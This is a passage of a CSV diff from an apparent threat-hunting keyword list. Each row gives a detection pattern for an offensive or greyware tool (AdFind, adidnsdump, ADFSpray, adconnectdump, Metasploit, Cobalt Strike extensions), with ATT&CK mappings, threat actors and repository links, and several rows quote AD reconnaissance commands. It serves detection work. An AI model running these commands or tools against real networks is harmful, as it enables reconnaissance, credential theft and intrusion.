Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*adexplorer.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adexplorer.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z"
+"*adexplorer.zip*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adexplorer64.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. 
It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adexplorer64a.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ADExplorerSnapshot.py*","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","7","680","90","2023-08-24T11:58:03Z","2021-12-22T14:42:23Z"
+"*ADExplorerSnapshot.py.git*","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","7","680","90","2023-08-24T11:58:03Z","2021-12-22T14:42:23Z"
+"*adfind -f *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind -f objectclass=trusteddomain*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.bat*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -f (objectcategory=person) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -f *(objectcategory=group)* > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -f objectcategory=computer > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation 
tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -f objectclass=trusteddomain*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -gcb -sc trustdmp > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z"
+"*adfind.exe -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*adfind.exe*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*AdFind.zip*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://www.joeware.net/freetools/tools/adfind/usage.htm","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*ADFSpoof.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ADFSpoof-master*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z"
+"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z"
+"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z"
+"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against 
Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z"
+"*ADHunt-main.zip*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*adidnsdump -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*adidnsdump*","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","8","772","105","2023-06-20T07:49:31Z","2019-04-24T17:18:46Z"
+"*ad-ldap-enum.py*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z"
+"*ad-ldap-enum-main*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z"
+"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*Admin2Sys.exe*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z"
+"*Admin2Sys-main*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z"
+"*Adminisme/ServerScan/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
+"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
+"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - 
T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z"
+"*Advanced IP Scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*advanced_ip_scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Advanced_IP_Scanner*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Advanced_Port_Scanner_*.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2242","569","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z"
+"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ADZero.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","20","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z"
+"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z"
+"*ag_load_script*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*agent*DNSCommunication.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
